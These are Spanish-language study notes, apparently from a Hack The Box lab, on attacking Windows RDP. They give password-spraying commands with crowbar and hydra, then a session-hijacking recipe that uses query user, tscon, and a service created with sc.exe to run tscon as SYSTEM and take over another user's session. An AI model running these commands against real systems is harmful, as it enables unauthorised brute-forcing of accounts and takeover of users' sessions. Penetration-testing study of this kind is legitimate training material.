Herramienta:
https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
rdesktop -u admin -p password123 192.168.2.143
Suponiendo que tengamos permisos de administrador locla en la maquina comprometida y hay otro usuario tambien por RDP podemos secuestrar la session para exscalar nuestro privilegios y hacerse pasar por la cuenta
Para hacerse parsar con exito por un usuario sin su contraseƱa necesitamos privilegios SYSTEM y usar microsoft tscon.exe que permite a los usuarios conectarse a otra sesion de escritorio, funciona epsecifciando el session ID y el nombre de session (podemos ver los ID usando query user)
Herramienta : https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon
CMD: query user : ver las essiones activas
C:\\htb> tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
Si tenemos privilegios de administraodr local, odemos usar varios metodos paraobtener los privilegios system como psexec o mimikatz. un truco simple es crear un serviciio de windows que, por defecto, se ejeutara como Local System y ejecutara cualquier binario con SYSTEM. Usaremos sc.exe primero especificando el nomrbe del servicio (sessionhijak) y el binpath que es el comando qu equeremos ejecutarhttps://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon
C:\\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
C:\\htb> net start sessionhijack